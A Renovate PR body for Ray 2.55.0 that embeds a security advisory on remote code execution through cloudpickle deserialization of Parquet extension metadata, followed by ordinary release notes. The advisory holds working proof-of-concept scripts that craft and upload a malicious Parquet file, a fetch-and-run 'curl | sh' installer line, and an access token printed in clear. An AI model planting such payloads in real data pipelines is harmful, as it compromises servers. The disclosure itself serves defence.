
Commit 69b3fc6

Update dependency ray to v2.55.0 [SECURITY] - abandoned (#7629)
> ℹ️ **Note**
>
> This PR body was truncated due to platform limits.

This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [ray](https://redirect.github.com/ray-project/ray) | `2.54.0` → `2.55.0` | ![age](https://developer.mend.io/api/mc/badges/age/pypi/ray/2.55.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/ray/2.54.0/2.55.0?slim=true) |

---

> [!WARNING]
> Some dependencies could not be looked up. Check the [Dependency Dashboard](../issues/357) for more information.

---

### Ray: Remote Code Execution via Parquet Arrow Extension Type Deserialization

[CVE-2026-41486](https://nvd.nist.gov/vuln/detail/CVE-2026-41486) / [GHSA-mw35-8rx3-xf9r](https://redirect.github.com/advisories/GHSA-mw35-8rx3-xf9r)

<details>
<summary>More information</summary>

#### Details

##### Remote Code Execution via Parquet Arrow Extension Type Deserialization

##### Summary

Ray Data registers custom Arrow extension types (`ray.data.arrow_tensor`, `ray.data.arrow_tensor_v2`, `ray.data.arrow_variable_shaped_tensor`) globally in PyArrow. When PyArrow reads a Parquet file containing one of these extension types, it calls `__arrow_ext_deserialize__` on the field's metadata bytes. Ray's implementation passes these bytes directly to `cloudpickle.loads()`, achieving arbitrary code execution during schema parsing, before any row data is read.

In May 2024, Ray fixed a related vulnerability in `PyExtensionType`-based extension types ([issue #41314](https://redirect.github.com/ray-project/ray/issues/41314), [PR #45084](https://redirect.github.com/ray-project/ray/pull/45084)). In July 2025, [PR #54831](https://redirect.github.com/ray-project/ray/pull/54831) introduced `cloudpickle.loads()` into the replacement extension types' deserialization path, reintroducing the same class of vulnerability.
Note: Source links in this report are pinned to the Ray 2.54.0 release commit (`48bd1f8fa4`) for stable line references. We also re-verified the same vulnerable code paths on current `master` as of March 17, 2026.

##### Details

##### Extension type registration

Ray Data registers three Arrow extension types globally in PyArrow:

```python
# python/ray/data/_internal/tensor_extensions/arrow.py:1603-1605
pa.register_extension_type(ArrowTensorType((0,), pa.int64()))
pa.register_extension_type(ArrowTensorTypeV2((0,), pa.int64()))
pa.register_extension_type(ArrowVariableShapedTensorType(pa.int64(), 0))
```

Registration happens at module load time ([`__init__.py:94-95`](https://redirect.github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/__init__.py#L94-L95)), and any use of `ray.data` triggers it. Once registered, PyArrow automatically calls `__arrow_ext_deserialize__` whenever it encounters these extension type names in any Parquet file's schema, including files from untrusted sources.
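The consequence of global registration can be sketched without PyArrow at all. The stdlib-only model below (the `REGISTRY` dict, `register_extension_type`, and `read_schema` are simplified stand-ins invented for illustration, not PyArrow's actual internals) shows the key property: once a deserializer is registered under a name, merely parsing a schema that mentions that name invokes the deserializer on file-controlled bytes.

```python
import json

# Hypothetical stand-ins for PyArrow's global extension-type registry and
# its schema parser; names and shapes are illustrative only.
REGISTRY = {}

def register_extension_type(name, deserialize):
    REGISTRY[name] = deserialize

def read_schema(fields):
    """Parse a schema: for any field whose extension name is registered,
    the registered deserializer runs on the file's metadata bytes BEFORE
    any row data is read."""
    out = []
    for name, ext_name, metadata in fields:
        if ext_name in REGISTRY:
            out.append((name, REGISTRY[ext_name](metadata)))
        else:
            out.append((name, None))
    return out

# The library registers its type once, at import time ...
register_extension_type("ray.data.arrow_tensor", lambda raw: json.loads(raw))

# ... and from then on ANY file that names that type reaches the deserializer,
# regardless of which API performed the read.
untrusted_fields = [("tensor", "ray.data.arrow_tensor", b"[3, 224, 224]")]
schema = read_schema(untrusted_fields)
assert schema == [("tensor", [3, 224, 224])]
```

In this model the deserializer is safe (`json.loads`); the report's point is that Ray wires a `cloudpickle.loads` call into the equivalent slot, so the same trigger path executes attacker-chosen code.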
##### The code path to `cloudpickle.loads()`

All three extension types inherit from `ArrowExtensionSerializeDeserializeCache`, whose `__arrow_ext_deserialize__` method ([`arrow.py:176-179`](https://redirect.github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/_internal/tensor_extensions/arrow.py#L176-L179)) delegates to subclass methods that ultimately call `_deserialize_with_fallback()`:

```python
# python/ray/data/_internal/tensor_extensions/arrow.py:84-96
def _deserialize_with_fallback(serialized: bytes, field_name: str = "data"):
    """Deserialize data with cloudpickle first, fallback to JSON."""
    try:
        # Try cloudpickle first (new format)
        return cloudpickle.loads(serialized)  # <-- arbitrary code execution
    except Exception:
        # Fallback to JSON format (legacy)
        try:
            return json.loads(serialized)
        except json.JSONDecodeError:
            raise ValueError(
                f"Unable to deserialize {field_name} from {type(serialized)}"
            )
```

The `serialized` bytes come directly from the Parquet file's field-level metadata (`ARROW:extension:metadata`) with no validation. `cloudpickle.loads()` is tried **first**, meaning a crafted payload will always be executed before the safe JSON fallback is reached.

For `ArrowTensorType`, the call chain is:

```
__arrow_ext_deserialize__(cls, storage_type, serialized)    # arrow.py:176
 -> _arrow_ext_deserialize_cache(serialized, value_type)    # arrow.py:178
 -> _arrow_ext_deserialize_compute(serialized, value_type)  # arrow.py:652
 -> _deserialize_with_fallback(serialized, "shape")         # arrow.py:653
 -> cloudpickle.loads(serialized)                           # arrow.py:88  RCE
```

`ArrowTensorTypeV2` ([`arrow.py:679-680`](https://redirect.github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/_internal/tensor_extensions/arrow.py#L679-L680)) and `ArrowVariableShapedTensorType` ([`arrow.py:1076-1077`](https://redirect.github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/_internal/tensor_extensions/arrow.py#L1076-L1077)) follow the same pattern.
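The stdlib `pickle` module shares the `__reduce__` protocol that cloudpickle uses, so the execute-on-load behavior, and the payload shape used in the PoCs below, can be demonstrated with a benign stand-in. The expression here only imports `sys` instead of running a shell command; everything else mirrors the real payload construction.

```python
import pickle

class Trigger:
    def __reduce__(self):
        # At load time, pickle calls eval(expr). A real payload would call
        # os.system here; this benign expression only imports sys. The
        # trailing ", (1,))[1]" indexing discards the side effect's value
        # and yields (1,), so the "deserialized metadata" still looks like
        # a plausible shape tuple.
        return (eval, ("(__import__('sys'), (1,))[1]",))

payload = pickle.dumps(Trigger())  # what an attacker embeds in the metadata
result = pickle.loads(payload)     # the side effect runs during loads()
assert result == (1,)
```

No method on `Trigger` is ever called by the reader: the mere act of deserializing the bytes executes the embedded callable.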
##### Why the existing mitigation doesn't help

After issue [#41314](https://redirect.github.com/ray-project/ray/issues/41314), Ray added `check_for_legacy_tensor_type()` in [`parquet_datasource.py:146-170`](https://redirect.github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/_internal/datasource/parquet_datasource.py#L146-L170) to block the old `PyExtensionType`-based tensor types:

```python
# python/ray/data/_internal/datasource/parquet_datasource.py:146-170
def check_for_legacy_tensor_type(schema):
    """Check for the legacy tensor extension type and raise an error if found.

    Ray Data uses an extension type to represent tensors in Arrow tables.
    Previously, the extension type extended `PyExtensionType`. However, this
    base type can expose users to arbitrary code execution. To prevent this,
    we don't load the type by default.
    """
    for name, type in zip(schema.names, schema.types):
        if isinstance(type, pa.UnknownExtensionType) and isinstance(
            type, pa.PyExtensionType
        ):
            raise RuntimeError(...)
```

This guard checks for `PyExtensionType` / `UnknownExtensionType`. It does **not** check for the currently registered `ray.data.arrow_tensor` types, which are the ones that call `cloudpickle.loads()`. Additionally, the check runs after PyArrow has already deserialized the schema, so even if it checked for the current types, the code execution would already have occurred.

##### Outside Ray's documented threat model

Ray's [security documentation](https://docs.ray.io/en/latest/ray-security/index.html) states that Ray relies on network isolation and "extensively uses cloudpickle." This vulnerability does not require cluster access. The payload arrives through a Parquet file from cloud storage, a data lake, HuggingFace, or a shared filesystem. A perfectly firewalled Ray cluster is vulnerable if it reads a crafted file.

##### Impact

- **Affected versions**: Ray 2.49.0 through 2.54.0 (latest release as of March 2026). The vulnerable `_deserialize_with_fallback` function with `cloudpickle.loads()` was introduced in commit `f6d21db1a4` ([PR #54831](https://redirect.github.com/ray-project/ray/pull/54831), July 2025), first released in Ray 2.49.0.
- **Affected configurations**: Any process that uses Ray Data and reads Parquet files. The extension types are registered globally in PyArrow, so all Parquet reads in the process are affected, including `ray.data.read_parquet()`, `pyarrow.parquet.read_table()`, `pandas.read_parquet()`, etc.
- **Attacker prerequisites**: The attacker must place a crafted Parquet file where a Ray Data pipeline reads it. No authentication or cluster access is required. The Parquet file must contain a column with a `ray.data.arrow_tensor` (or v2, or variable-shaped) extension type name, which makes this a targeted attack against Ray Data users.
- **CIA impact**: Arbitrary command execution as the Ray worker process user, resulting in full server compromise.
- **Severity**: Critical

##### Attack scenarios

1. **HuggingFace datasets**: Ray's documentation [recommends](https://docs.ray.io/en/latest/data/loading-data.html#reading-files-from-hugging-face) reading Parquet datasets from HuggingFace using `ray.data.read_parquet("hf://datasets/...", filesystem=HfFileSystem())`. Anyone can create a HuggingFace dataset containing a crafted Parquet file. A tensor column with `ray.data.arrow_tensor` metadata is normal for an ML dataset, as tensor columns are a core Ray Data feature. We verified this scenario end-to-end with a private HuggingFace dataset (see PoC below).
2. **Multi-tenant ML platforms**: Organizations running shared Ray clusters where multiple teams submit data processing jobs. If one team can write Parquet files to shared storage that another team reads, the writer can execute arbitrary code in the reader's context.
3. **Compromised data pipelines**: An upstream data producer writes Parquet files with crafted tensor column metadata. The payload survives because standard Parquet tools preserve extension metadata transparently.

##### PoC

We provide two reproductions: a minimal local PoC and a full end-to-end scenario via HuggingFace.

**Prerequisites:** Python 3.12+ and [uv](https://docs.astral.sh/uv/getting-started/installation/) (`curl -LsSf https://astral.sh/uv/install.sh | sh`).

##### PoC 1: Local file

Creates a valid Parquet file with a tensor column whose extension metadata contains a crafted cloudpickle payload. Reading the file with Ray Data triggers code execution during schema parsing.

**1. Create the Parquet file:**

```bash
cat > craft_parquet.py << 'SCRIPT'
import cloudpickle
import pyarrow as pa
import pyarrow.parquet as pq

COMMAND = "id > /tmp/ray-tensor-rce-proof"

class Trigger:
    def __reduce__(self):
        return (eval, (f"(__import__('os').system({COMMAND!r}), (1,))[1]",))

storage_type = pa.list_(pa.int64())
schema = pa.schema([
    pa.field("tensor", storage_type, metadata={
        b"ARROW:extension:name": b"ray.data.arrow_tensor",
        b"ARROW:extension:metadata": cloudpickle.dumps(Trigger()),
    }),
    pa.field("id", pa.int64()),
    pa.field("text", pa.string()),
])
table = pa.Table.from_arrays([
    pa.array([[1, 2, 3], [4, 5, 6]], type=storage_type),
    pa.array([1, 2]),
    pa.array(["hello", "world"]),
], schema=schema)
pq.write_table(table, "crafted.parquet")
print("Created crafted.parquet")
SCRIPT
uv run --with 'cloudpickle,pyarrow' python craft_parquet.py
```

**2. Read it with Ray Data:**

```bash
rm -f /tmp/ray-tensor-rce-proof
uv run --with 'ray[data]' python -c "
import ray.data
ray.data.read_parquet('crafted.parquet')
"
cat /tmp/ray-tensor-rce-proof
# Expected: output of 'id' — confirms code execution
```

##### PoC 2: End-to-end via HuggingFace

This demonstrates the realistic attack scenario: a crafted Parquet file hosted as a HuggingFace dataset, read by a Ray cluster following [Ray's own documentation](https://docs.ray.io/en/latest/data/loading-data.html#reading-files-from-hugging-face).
We uploaded a crafted Parquet file to a private HuggingFace dataset at [`antiproof/parquet-tensor-disclosure`](https://huggingface.co/datasets/antiproof/parquet-tensor-disclosure). The file looks like a normal ML dataset with tensor, id, and text columns. The read-only token below gives access.

**Upload script** (for reference, this is how we seeded the dataset):

```bash
cat > upload_dataset.py << 'SCRIPT'
# /// script
# requires-python = ">=3.10"
# dependencies = ["cloudpickle", "pyarrow", "huggingface_hub"]
# ///
"""Upload a crafted Parquet file to a HuggingFace dataset.

Prerequisites: huggingface-cli login (with a write token)
Usage: uv run upload_dataset.py <repo_id> <command>
"""
import sys, tempfile
from pathlib import Path

import cloudpickle, pyarrow as pa, pyarrow.parquet as pq
from huggingface_hub import HfApi

def build_parquet(output, command):
    class Trigger:
        def __reduce__(self):
            return (eval, (f"(__import__('os').system({command!r}), (1,))[1]",))

    storage_type = pa.list_(pa.int64())
    schema = pa.schema([
        pa.field("tensor", storage_type, metadata={
            b"ARROW:extension:name": b"ray.data.arrow_tensor",
            b"ARROW:extension:metadata": cloudpickle.dumps(Trigger()),
        }),
        pa.field("id", pa.int64()),
        pa.field("text", pa.string()),
    ])
    table = pa.Table.from_arrays([
        pa.array([[1, 2, 3], [4, 5, 6]], type=storage_type),
        pa.array([1, 2]),
        pa.array(["hello", "world"]),
    ], schema=schema)
    pq.write_table(table, str(output))

repo_id, command = sys.argv[1], sys.argv[2]
with tempfile.TemporaryDirectory() as tmpdir:
    parquet = Path(tmpdir) / "train.parquet"
    build_parquet(parquet, command)
    HfApi().upload_file(
        path_or_fileobj=str(parquet),
        path_in_repo="data/train.parquet",
        repo_id=repo_id,
        repo_type="dataset",
    )
print(f"Uploaded to https://huggingface.co/datasets/{repo_id}")
SCRIPT
# We ran:
# uv run upload_dataset.py antiproof/parquet-tensor-disclosure 'id > /tmp/ray-tensor-rce-proof'
```

**Reproduce** (reads the dataset from HuggingFace, no local files needed):

```bash
rm -f /tmp/ray-tensor-rce-proof
HF_TOKEN=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 \
uv run --with 'ray[data],huggingface_hub' python -c "
import ray.data
from huggingface_hub import HfFileSystem
ray.data.read_parquet(
    'hf://datasets/antiproof/parquet-tensor-disclosure/data/train.parquet',
    filesystem=HfFileSystem(),
)
"
cat /tmp/ray-tensor-rce-proof
# Expected: output of 'id' — confirms code execution via HuggingFace dataset
```

The token above is read-only. The dataset is private to prevent unintended exposure.

##### Suggested fix

The extension metadata stores simple values (a shape tuple like `(3, 224, 224)` or an ndim integer). These do not require cloudpickle.

1. **Replace `cloudpickle.loads()` in `_deserialize_with_fallback()` with `json.loads()`.** The tensor shape and ndim are JSON-serializable. For backward compatibility with files written using the current cloudpickle format, gate `cloudpickle.loads()` behind an opt-in environment variable (following the pattern already established with `RAY_DATA_AUTOLOAD_PYEXTENSIONTYPE`).
2. **Serialize new extension type metadata as JSON by default.** `json.dumps([3, 224, 224])` carries the same information as `cloudpickle.dumps((3, 224, 224))`, without the code execution risk.
3. **Add a security note to the `read_parquet()` documentation** explaining that Parquet files from untrusted sources can execute arbitrary code when tensor extension types are registered.

Please contact security@antiproof.ai with any questions about this disclosure policy or related security research.
#### Severity

- CVSS Score: 8.9 / 10 (High)
- Vector String: `CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H`

#### References

- [https://github.com/ray-project/ray/security/advisories/GHSA-mw35-8rx3-xf9r](https://redirect.github.com/ray-project/ray/security/advisories/GHSA-mw35-8rx3-xf9r)
- [https://github.com/advisories/GHSA-mw35-8rx3-xf9r](https://redirect.github.com/advisories/GHSA-mw35-8rx3-xf9r)

This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-mw35-8rx3-xf9r) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).

</details>

---

### Release Notes

<details>
<summary>ray-project/ray (ray)</summary>

### [`v2.55.0`](https://redirect.github.com/ray-project/ray/releases/tag/ray-2.55.0)

[Compare Source](https://redirect.github.com/ray-project/ray/compare/ray-2.54.1...ray-2.55.0)

#### Ray Data

##### 🎉 New Features

- Add `DataSourceV2` API with scanner/reader framework, file listing, and file partitioning ([#61220](https://redirect.github.com/ray-project/ray/issues/61220), [#61615](https://redirect.github.com/ray-project/ray/issues/61615), [#61997](https://redirect.github.com/ray-project/ray/issues/61997))
- Support GPU shuffle with `rapidsmpf` 26.2 ([#61371](https://redirect.github.com/ray-project/ray/issues/61371), [#62062](https://redirect.github.com/ray-project/ray/issues/62062))
- Add Kafka datasink, migrate to `confluent-kafka`, support `datetime` offsets ([#60307](https://redirect.github.com/ray-project/ray/issues/60307), [#61284](https://redirect.github.com/ray-project/ray/issues/61284), [#60909](https://redirect.github.com/ray-project/ray/issues/60909))
- Add Turbopuffer datasink ([#58910](https://redirect.github.com/ray-project/ray/issues/58910))
- Add 2-phase commit checkpointing with trie recovery and load method ([#61821](https://redirect.github.com/ray-project/ray/issues/61821), [#60951](https://redirect.github.com/ray-project/ray/issues/60951))
- Queue-based autoscaling policy integrated with task consumers ([#59548](https://redirect.github.com/ray-project/ray/issues/59548), [#60851](https://redirect.github.com/ray-project/ray/issues/60851))
- Enable autoscaling for GPU stages ([#61130](https://redirect.github.com/ray-project/ray/issues/61130))
- Expressions: add `random()`, `uuid()`, `cast`, and map namespace support ([#59656](https://redirect.github.com/ray-project/ray/issues/59656), [#60695](https://redirect.github.com/ray-project/ray/issues/60695), [#59879](https://redirect.github.com/ray-project/ray/issues/59879))
- Add support for Arrow native fixed-shape tensor type ([#56284](https://redirect.github.com/ray-project/ray/issues/56284))
- Support writing tensors to tfrecords ([#60859](https://redirect.github.com/ray-project/ray/issues/60859))
- Add `pathlib.Path` support to `read_*` functions ([#61126](https://redirect.github.com/ray-project/ray/issues/61126))
- Add `cudf` as a `batch_format` ([#61329](https://redirect.github.com/ray-project/ray/issues/61329))
- Allow `ActorPoolStrategy` for `read_datasource()` via `compute` parameter ([#59633](https://redirect.github.com/ray-project/ray/issues/59633))
- Introduce `ExecutionCache` for streamlined caching ([#60996](https://redirect.github.com/ray-project/ray/issues/60996))
- Support `strict=False` mode for `StreamingRepartition` ([#60295](https://redirect.github.com/ray-project/ray/issues/60295))
- Port changes from lance-ray into Ray Data ([#60497](https://redirect.github.com/ray-project/ray/issues/60497))
- Enable PyArrow compute-to-expression conversion for predicate pushdown ([#61617](https://redirect.github.com/ray-project/ray/issues/61617))
- Add vLLM metrics export and Data LLM Grafana dashboard ([#60385](https://redirect.github.com/ray-project/ray/issues/60385))
- Include logical memory in resource manager scheduling decisions ([#60774](https://redirect.github.com/ray-project/ray/issues/60774))
- Add monotonically increasing ID support ([#59290](https://redirect.github.com/ray-project/ray/issues/59290))

##### 💫 Enhancements

- Performance: cache `_map_task` args, heap-based actor ranking, actor pool map improvements ([#61996](https://redirect.github.com/ray-project/ray/issues/61996), [#62114](https://redirect.github.com/ray-project/ray/issues/62114), [#61591](https://redirect.github.com/ray-project/ray/issues/61591))
- Optimize concat tables and PyArrow schema hashing ([#61315](https://redirect.github.com/ray-project/ray/issues/61315), [#62108](https://redirect.github.com/ray-project/ray/issues/62108))
- Reduce default `DownstreamCapacityBackpressurePolicy` threshold to 50% ([#61890](https://redirect.github.com/ray-project/ray/issues/61890))
- Improve reproducibility for random APIs ([#59662](https://redirect.github.com/ray-project/ray/issues/59662))
- Clamp batch size to fall within C++ 32-bit int range ([#62242](https://redirect.github.com/ray-project/ray/issues/62242))
- Account for external consumer object store usage in resource manager budget ([#62117](https://redirect.github.com/ray-project/ray/issues/62117))
- Make `get_parquet_dataset` configurable in number of fragments to scan ([#61670](https://redirect.github.com/ray-project/ray/issues/61670))
- Consolidate schema inference and make all preprocessors implement `SerializablePreprocessorBase` ([#61213](https://redirect.github.com/ray-project/ray/issues/61213), [#61341](https://redirect.github.com/ray-project/ray/issues/61341))
- Disable hanging issue detection by default ([#62405](https://redirect.github.com/ray-project/ray/issues/62405))
- Make execution callback dataflow explicit to prevent state leakage ([#61405](https://redirect.github.com/ray-project/ray/issues/61405))
- Log `DataContext` in JSON format at execution start for traceability ([#61150](https://redirect.github.com/ray-project/ray/issues/61150), [#61428](https://redirect.github.com/ray-project/ray/issues/61428))
- Autoscaler: configurable traceback, Prometheus gauges, relaxed constraints ([#62210](https://redirect.github.com/ray-project/ray/issues/62210), [#62209](https://redirect.github.com/ray-project/ray/issues/62209), [#61917](https://redirect.github.com/ray-project/ray/issues/61917), [#61385](https://redirect.github.com/ray-project/ray/issues/61385))
- Add metrics for task scheduling time, output backpressure, and logical memory ([#61192](https://redirect.github.com/ray-project/ray/issues/61192), [#61007](https://redirect.github.com/ray-project/ray/issues/61007), [#61436](https://redirect.github.com/ray-project/ray/issues/61436))
- Prevent operators from dominating entire shared object store budget ([#61605](https://redirect.github.com/ray-project/ray/issues/61605))
- Eliminate generators to avoid intermediate state pinning ([#60598](https://redirect.github.com/ray-project/ray/issues/60598))
- Default log encoding to UTF-8 on Windows ([#61143](https://redirect.github.com/ray-project/ray/issues/61143))
- Remove legacy `BlockList`, `locality_with_output`, old callback API, PyArrow 9.0 checks ([#60575](https://redirect.github.com/ray-project/ray/issues/60575), [#61044](https://redirect.github.com/ray-project/ray/issues/61044), [#62055](https://redirect.github.com/ray-project/ray/issues/62055), [#61483](https://redirect.github.com/ray-project/ray/issues/61483))
- Upgrade to `pyiceberg` 0.11.0; cap `pandas` to <3 ([#61062](https://redirect.github.com/ray-project/ray/issues/61062), [#60406](https://redirect.github.com/ray-project/ray/issues/60406))
- Refactor logical operators to frozen dataclasses ([#61059](https://redirect.github.com/ray-project/ray/issues/61059), [#61308](https://redirect.github.com/ray-project/ray/issues/61308), [#61348](https://redirect.github.com/ray-project/ray/issues/61348), [#61349](https://redirect.github.com/ray-project/ray/issues/61349), [#61351](https://redirect.github.com/ray-project/ray/issues/61351), [#61364](https://redirect.github.com/ray-project/ray/issues/61364), [#61481](https://redirect.github.com/ray-project/ray/issues/61481))
- Prevent aggregator head node scheduling ([#61288](https://redirect.github.com/ray-project/ray/issues/61288))
- Add error for `local://` paths with a zero-resource head node ([#60709](https://redirect.github.com/ray-project/ray/issues/60709))

##### 🔨 Fixes

- Fix RCE in Arrow extension type deserialization from Parquet ([#62056](https://redirect.github.com/ray-project/ray/issues/62056))
- Fix `StreamingSplitDataIterator.schema()` ([#62057](https://redirect.github.com/ray-project/ray/issues/62057))
- Fix `ParquetDatasource` handling of `FileSystemFactory.inspect` ([#62065](https://redirect.github.com/ray-project/ray/issues/62065))
- Fix `read_parquet` file-extension filtering for versioned object-store URIs ([#61376](https://redirect.github.com/ray-project/ray/issues/61376))
- Fix `wide_schema_pipeline_tensors` cloudpickle deserialization ([#62149](https://redirect.github.com/ray-project/ray/issues/62149))
- Fix `OpBufferQueue` race condition ([#60828](https://redirect.github.com/ray-project/ray/issues/60828))
- Fix scheduling metrics computation ([#62031](https://redirect.github.com/ray-project/ray/issues/62031))
- Fix `OneHotEncoder` `max_categories` to use global top-k instead of per-partition ([#60790](https://redirect.github.com/ray-project/ray/issues/60790))
- Fix `ReservationOpResourceAllocator` resource borrowing for `ActorPoolMapOperator` ([#60882](https://redirect.github.com/ray-project/ray/issues/60882))
- Fix `DatabricksUCDatasource` `schema()` shadowing by schema string attribute ([#61282](https://redirect.github.com/ray-project/ray/issues/61282))
- Fix `AliasExpr` structural equality to respect rename flag ([#60711](https://redirect.github.com/ray-project/ray/issues/60711))
- Fix `_align_struct_fields` failure with unaligned scalar fields ([#58364](https://redirect.github.com/ray-project/ray/issues/58364))
- Fix `min_scheduling_resources` fallback to `incremental_resource_usage` ([#60997](https://redirect.github.com/ray-project/ray/issues/60997))
- Fix output backpressure unblocking sequence for terminal ops ([#60798](https://redirect.github.com/ray-project/ray/issues/60798))
- Fix multi-input operator object store memory attribution ([#61208](https://redirect.github.com/ray-project/ray/issues/61208))
- Fix reference cycle by moving to module scope ([#61934](https://redirect.github.com/ray-project/ray/issues/61934))
- Fix autoscaler logging: reduce verbose output and move traceback to debug ([#61989](https://redirect.github.com/ray-project/ray/issues/61989), [#62126](https://redirect.github.com/ray-project/ray/issues/62126))
- Fix double counting `ref_bundle` + `input_files` ([#61774](https://redirect.github.com/ray-project/ray/issues/61774))
- Replace `on_exit` hook with `__ray_shutdown__` to fix UDF cleanup race ([#61700](https://redirect.github.com/ray-project/ray/issues/61700))
- Prevent `Limit` from getting pushed past `map_groups` ([#60881](https://redirect.github.com/ray-project/ray/issues/60881))
- Propagate schema in empty `_shuffle_block` to fix `ColumnNotFound` in chained left joins ([#61507](https://redirect.github.com/ray-project/ray/issues/61507))
- Fix unclear metadata warning and incorrect operator name logging ([#61380](https://redirect.github.com/ray-project/ray/issues/61380))
- Clamp rolling utilization averages to zero ([#61543](https://redirect.github.com/ray-project/ray/issues/61543))
- Fix floating point errors in `TimeWindowAverageCalculator` ([#61580](https://redirect.github.com/ray-project/ray/issues/61580))
- Remove default task-level timeout and clamp `end_offset` in Kafka datasource ([#61476](https://redirect.github.com/ray-project/ray/issues/61476))
- Avoid redundant reads in `train_test_split` ([#60274](https://redirect.github.com/ray-project/ray/issues/60274))
- Return `None` when no outputs have been produced ([#62029](https://redirect.github.com/ray-project/ray/issues/62029))
- Replace bare `raise` with `TypeError` in string concatenation ([#60795](https://redirect.github.com/ray-project/ray/issues/60795))

##### 📖 Documentation

- Add job-level checkpointing documentation ([#60921](https://redirect.github.com/ray-project/ray/issues/60921))
- Update `exclude_resources` docs for Train autoscaling changes ([#61990](https://redirect.github.com/ray-project/ray/issues/61990))
- Add `locality_with_output` migration instructions ([#61151](https://redirect.github.com/ray-project/ray/issues/61151))
- Document `max_tasks_in_flight_per_actor` vs `max_concurrent_batches` ([#60477](https://redirect.github.com/ray-project/ray/issues/60477))
- Add missing `MOD` operation docs; improve `ray.data.Datasource` docs ([#60803](https://redirect.github.com/ray-project/ray/issues/60803), [#59654](https://redirect.github.com/ray-project/ray/issues/59654))
- Add `polars` usage instructions ([#60029](https://redirect.github.com/ray-project/ray/issues/60029))

#### Ray Serve

##### 🎉 New Features:

- Added end-to-end gRPC client and bidirectional streaming support, including public APIs, proxy handling, proto updates, and developer docs, so Serve apps can handle streaming workloads natively instead of building custom transport layers. ([#60767](https://redirect.github.com/ray-project/ray/issues/60767), [#60768](https://redirect.github.com/ray-project/ray/issues/60768), [#60769](https://redirect.github.com/ray-project/ray/issues/60769), [#60770](https://redirect.github.com/ray-project/ray/issues/60770), [#60771](https://redirect.github.com/ray-project/ray/issues/60771))
- Introduced HAProxy-based serving with fallback proxy support and load-balancer tunables, giving operators a higher-throughput ingress path and more control over traffic behavior in production. ([#60586](https://redirect.github.com/ray-project/ray/issues/60586), [#61180](https://redirect.github.com/ray-project/ray/issues/61180), [#61271](https://redirect.github.com/ray-project/ray/issues/61271), [#61468](https://redirect.github.com/ray-project/ray/issues/61468), [#61988](https://redirect.github.com/ray-project/ray/issues/61988))
- Added queue-based autoscaling for async inference and Taskiq-backed workloads, so scaling decisions can account for both HTTP in-flight load and queued tasks. ([#59548](https://redirect.github.com/ray-project/ray/issues/59548), [#60851](https://redirect.github.com/ray-project/ray/issues/60851), [#60977](https://redirect.github.com/ray-project/ray/issues/60977), [#61008](https://redirect.github.com/ray-project/ray/issues/61008))
- Rolled out gang scheduling support across validation, core scheduling, fault tolerance, downscaling, autoscaling, rolling updates, and migration, enabling coordinated multi-replica placement for tightly coupled workloads. ([#60944](https://redirect.github.com/ray-project/ray/issues/60944), [#61205](https://redirect.github.com/ray-project/ray/issues/61205), [#61206](https://redirect.github.com/ray-project/ray/issues/61206), [#61207](https://redirect.github.com/ray-project/ray/issues/61207), [#61215](https://redirect.github.com/ray-project/ray/issues/61215), [#61467](https://redirect.github.com/ray-project/ray/issues/61467), [#61216](https://redirect.github.com/ray-project/ray/issues/61216), [#61659](https://redirect.github.com/ray-project/ray/issues/61659))
- Introduced deployment-scoped actors with config/schema, lifecycle management, public API, and controller health checks, making it easier to run durable per-deployment sidecar-like logic inside Serve. ([#61639](https://redirect.github.com/ray-project/ray/issues/61639), [#61648](https://redirect.github.com/ray-project/ray/issues/61648), [#61664](https://redirect.github.com/ray-project/ray/issues/61664), [#61833](https://redirect.github.com/ray-project/ray/issues/61833), [#62161](https://redirect.github.com/ray-project/ray/issues/62161))

##### 💫 Enhancements:

- Added first-class tracing support for Serve, including inter-deployment gRPC propagation and richer streaming-path attributes, improving end-to-end observability across distributed request flows. ([#61230](https://redirect.github.com/ray-project/ray/issues/61230), [#61089](https://redirect.github.com/ray-project/ray/issues/61089), [#61451](https://redirect.github.com/ray-project/ray/issues/61451))
- Expanded operational metrics with replica utilization, richer error labeling, and client IP logging in access logs, helping teams diagnose bottlenecks and user-impacting issues faster. ([#60758](https://redirect.github.com/ray-project/ray/issues/60758), [#61092](https://redirect.github.com/ray-project/ray/issues/61092), [#60967](https://redirect.github.com/ray-project/ray/issues/60967))
- Improved autoscaling extensibility with class-based policies and `policy_kwargs`, so advanced users can package reusable autoscaling logic without custom forks. ([#60964](https://redirect.github.com/ray-project/ray/issues/60964))
- Reduced controller overhead with broad algorithmic improvements (indexing, cache reuse, and avoiding repeated per-tick work), which improves scalability as deployment and replica counts grow. ([#60810](https://redirect.github.com/ray-project/ray/issues/60810), [#60829](https://redirect.github.com/ray-project/ray/issues/60829), [#60830](https://redirect.github.com/ray-project/ray/issues/60830), [#60838](https://redirect.github.com/ray-project/ray/issues/60838), [#60842](https://redirect.github.com/ray-project/ray/issues/60842), [#60843](https://redirect.github.com/ray-project/ray/issues/60843), [#60844](https://redirect.github.com/ray-project/ray/issues/60844), [#60832](https://redirect.github.com/ray-project/ray/issues/60832), [#60806](https://redirect.github.com/ray-project/ray/issues/60806))
- Improved throughput-oriented operation controls by adding environment-based tuning and explicit throughput optimization logging, making performance behavior easier to configure and audit. ([#60757](https://redirect.github.com/ray-project/ray/issues/60757), [#62146](https://redirect.github.com/ray-project/ray/issues/62146))
- Upgraded Serve internals to Pydantic v2 and refined time-series aggregation behavior for more predictable metric accuracy under high load. ([#61061](https://redirect.github.com/ray-project/ray/issues/61061), [#61403](https://redirect.github.com/ray-project/ray/issues/61403))

##### 🔨 Fixes:

- Fixed a direct-ingress shutdown bug where replicas could hang indefinitely while draining stuck requests, ensuring bounded shutdown behavior in failure scenarios. ([#60754](https://redirect.github.com/ray-project/ray/issues/60754))
